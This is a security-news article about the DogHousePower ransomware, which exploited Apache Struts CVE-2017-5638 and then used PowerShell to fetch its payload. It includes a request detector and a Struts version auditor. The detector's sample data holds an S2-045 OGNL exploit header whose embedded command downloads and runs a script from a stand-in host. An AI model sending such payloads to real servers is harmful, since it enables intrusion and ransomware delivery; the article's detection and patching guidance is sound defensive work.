
Ransomware arsenal "gains a new recruit": Windows Server web servers under siege

2017-11-9 21:36 | Contributed by: xiaotiger | Source: the Internet

Summary: Introduction: Recently, the network security laboratory of security firm Canthink discovered a new ransomware family named "DogHousePower". It specifically targets web servers and database servers running on Windows Server and, interestingly, it is hosted on GitHub. ...

Introduction

Recently, the network security laboratory of security firm Canthink discovered a new ransomware family named "DogHousePower". It specifically targets web servers and database servers running on the Windows Server operating system and, interestingly, it is hosted on GitHub.

Ransomware analysis

We began by analysing the ransomware binary "2.exe" in the Hybrid Analysis VxStream sandbox and in a Windows virtual machine. The analysis showed that DogHousePower does not break in on its own: the attack chain first exploits a known vulnerability in Apache Struts 2 (CVE-2017-5638) to gain code execution on the server, then uses Microsoft PowerShell to download the ransomware payload and spread it further.
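The two stages above, Struts exploitation followed by a PowerShell download, can both be detected in front of the web server. CVE-2017-5638 is triggered by an OGNL expression placed in the Content-Type header, which Struts' Jakarta Multipart parser evaluated, so a proxy or WAF capture of request headers is the right place to look. The following is an added example, written for this article and not code from Canthink's report or from the ransomware; the request records, the IP addresses, the URL http://example.invalid/2.ps1 and the PowerShell indicator patterns are all constructed assumptions, and the exploit-shaped Content-Type only mimics the structure of public S2-045 payloads.

```python
import re
from dataclasses import dataclass
from typing import Dict, List, Optional

# Indicators taken from the public CVE-2017-5638 payload structure: an OGNL
# expression %{ ... } in the Content-Type header, which usually disables the
# OGNL sandbox via #_memberAccess before spawning a process.
OGNL_MARKERS = {
    "ognl-expression": re.compile(r"%\{"),
    "member-access-escape": re.compile(r"#_memberAccess"),
    "ognl-context": re.compile(r"ognl\.OgnlContext"),
    "process-builder": re.compile(r"java\.lang\.ProcessBuilder"),
}

# Assumed PowerShell download-cradle indicators; the report only says that
# PowerShell fetched the payload, the exact patterns are our own choice.
PS_CRADLE = re.compile(
    r"powershell(?:\.exe)?.*?"
    r"(?:DownloadString|DownloadFile|Invoke-WebRequest|Net\.WebClient|"
    r"Invoke-Expression|\bIEX\b|-e(?:nc(?:odedcommand)?)?\s)",
    re.IGNORECASE | re.DOTALL,
)

# Pulls the OS command out of the (#cmd='...') term used by common payloads.
CMD_RE = re.compile(r"#cmd='((?:[^'\\]|\\.)*)'")


@dataclass
class Finding:
    src: str
    path: str
    stage: str
    evidence: str


def extract_command(content_type: str) -> Optional[str]:
    """Return the OS command embedded in an OGNL payload, or None."""
    m = CMD_RE.search(content_type)
    return m.group(1) if m else None


def inspect_request(req: Dict) -> List[Finding]:
    """Flag one request record; returns [] for benign traffic."""
    findings: List[Finding] = []
    ctype = req.get("headers", {}).get("Content-Type", "")
    hits = [name for name, rx in OGNL_MARKERS.items() if rx.search(ctype)]
    if not hits:
        return findings
    findings.append(Finding(req["src"], req["path"], "struts-ognl", ",".join(hits)))
    cmd = extract_command(ctype)
    # Second stage: the command the OGNL payload runs is a PowerShell cradle
    if cmd and PS_CRADLE.search(cmd):
        findings.append(Finding(req["src"], req["path"], "powershell-cradle", cmd))
    return findings


def scan(requests: List[Dict]) -> List[Finding]:
    return [f for r in requests for f in inspect_request(r)]


# Constructed sample traffic (not from the report). The first record mimics
# the shape of public S2-045 payloads with a PowerShell cradle as the
# command; the other two are ordinary requests.
EXPLOIT_CT = (
    "%{(#_='multipart/form-data')."
    "(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess=#dm)."
    "(#cmd='powershell -nop -w hidden -c IEX((New-Object Net.WebClient)"
    ".DownloadString(\"http://example.invalid/2.ps1\"))')."
    "(#p=new java.lang.ProcessBuilder({'cmd.exe','/c',#cmd})).(#p.start())}"
)
SAMPLE_REQUESTS = [
    {"src": "203.0.113.7", "path": "/struts2-showcase/index.action",
     "headers": {"Content-Type": EXPLOIT_CT}},
    {"src": "198.51.100.2", "path": "/upload.action",
     "headers": {"Content-Type": "multipart/form-data; boundary=----abc123"}},
    {"src": "192.0.2.9", "path": "/index.action",
     "headers": {"Content-Type": "application/x-www-form-urlencoded"}},
]

if __name__ == "__main__":
    for f in scan(SAMPLE_REQUESTS):
        print(f"{f.src} {f.path} {f.stage}: {f.evidence[:70]}")
```

Note that ordinary access logs do not record Content-Type, so this logic has to run on a proxy, WAF or full-request capture; a hit on "struts-ognl" alone is already an exploitation attempt, and the "powershell-cradle" finding tells you the attempt was staging a download rather than just probing.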

Ransom demand

Part of the ransom note is written in Chinese, most likely to mislead victims and analysts trying to trace DogHousePower's real origin. The ransom demanded is the equivalent of 5,000 RMB in bitcoin, which may indicate that DogHousePower targets victims in Asia or originates there.

The note gives the victim 3 days to pay 5,000 RMB to the supplied address. The attackers say the price is negotiable, but if the 5,000 RMB is not paid within 3 days the demand rises to 6,000 RMB in bitcoin, and after 7 days to 7,000 RMB in bitcoin. Finally, the note warns that if no payment is received within 13 days, the files can never be decrypted.

To have files decrypted after payment, the attackers also provide a contact e-mail address ([email protected]) to which the victim sends the payment proof, a screenshot and their ID. They state that the encrypted files will be decrypted via e-mail, with each e-mail limited to 10 MB.

The ransom note is provided in several languages, including English, Russian, Spanish and Chinese, together with a document explaining "how to buy bitcoin in China".

In another notice the attackers state that they are considering allowing users to access Windows, Documents, Settings and other programs as usual.

Ransomware family

Researching the e-mail address and the ZCash account given in the ransom note, the researchers found that DogHousePower most likely evolved from the ".BELGIAN_COCOA", ".MyChemicalRomance4EVER", "LambdaLocker", "Pickles" and "CryPy" ransomware families.

Security recommendations

DogHousePower's attacks rely on a known vulnerability in Apache Struts 2, CVE-2017-5638 (fixed in Struts 2.3.32 and 2.5.10.1), so organisations should patch it immediately to protect themselves. We will also follow up with further updates on this ransomware; stay tuned!
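"Patch immediately" presupposes knowing which deployed applications still ship a vulnerable struts2-core jar. The following is an added example, not code from Canthink or the Struts project: it walks a servlet container's webapps directory, picks out struts2-core-*.jar files by name and classifies each version against the ranges in the Struts S2-045 advisory (affected 2.3.5 to 2.3.31 and 2.5 to 2.5.10; fixed in 2.3.32 and 2.5.10.1). The sample paths are constructed, and the jar filename is the only evidence used, so a renamed or shaded jar would be missed.

```python
import os
import re
from typing import Iterable, List, Tuple

# Version ranges from the Struts S2-045 advisory for CVE-2017-5638,
# expressed as half-open intervals [lo, hi) of version tuples.
AFFECTED = [((2, 3, 5), (2, 3, 32)), ((2, 5), (2, 5, 10, 1))]
FIX_23, FIX_25 = (2, 3, 32), (2, 5, 10, 1)
JAR_RE = re.compile(r"struts2-core-(\d+(?:\.\d+)+)\.jar$")


def parse_version(s: str) -> Tuple[int, ...]:
    """'2.5.10.1' -> (2, 5, 10, 1); tuples compare lexicographically."""
    return tuple(int(p) for p in s.split("."))


def assess(version: str) -> str:
    """'vulnerable', 'fixed', or 'unlisted' (older than the advisory's
    ranges; end-of-life, so upgrade anyway)."""
    v = parse_version(version)
    for lo, hi in AFFECTED:
        if lo <= v < hi:
            return "vulnerable"
    if v >= FIX_25 or FIX_23 <= v < (2, 5):
        return "fixed"
    return "unlisted"


def audit_jars(paths: Iterable[str]) -> List[Tuple[str, str, str]]:
    """(path, version, status) for every struts2-core jar among paths."""
    out = []
    for p in paths:
        m = JAR_RE.search(p.replace("\\", "/"))
        if m:
            out.append((p, m.group(1), assess(m.group(1))))
    return out


def find_jars(root: str) -> List[str]:
    """Walk a webapps root (assumed layout: .../WEB-INF/lib/*.jar)."""
    return [os.path.join(d, f)
            for d, _, files in os.walk(root)
            for f in files if JAR_RE.search(f)]


# Constructed sample paths, as found on a Windows Server Tomcat host.
SAMPLE_PATHS = [
    r"C:\tomcat\webapps\shop\WEB-INF\lib\struts2-core-2.3.31.jar",
    r"C:\tomcat\webapps\shop\WEB-INF\lib\commons-fileupload-1.3.2.jar",
    r"C:\tomcat\webapps\portal\WEB-INF\lib\struts2-core-2.5.10.1.jar",
    r"D:\apps\legacy\WEB-INF\lib\struts2-core-2.5.10.jar",
]

if __name__ == "__main__":
    for path, ver, status in audit_jars(SAMPLE_PATHS):
        print(f"{status:10} {ver:9} {path}")
```

Run `audit_jars(find_jars(r"C:\tomcat\webapps"))` on a real host; any "vulnerable" row is an application that this ransomware's first stage can reach, regardless of what the operating system's own patch level says.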
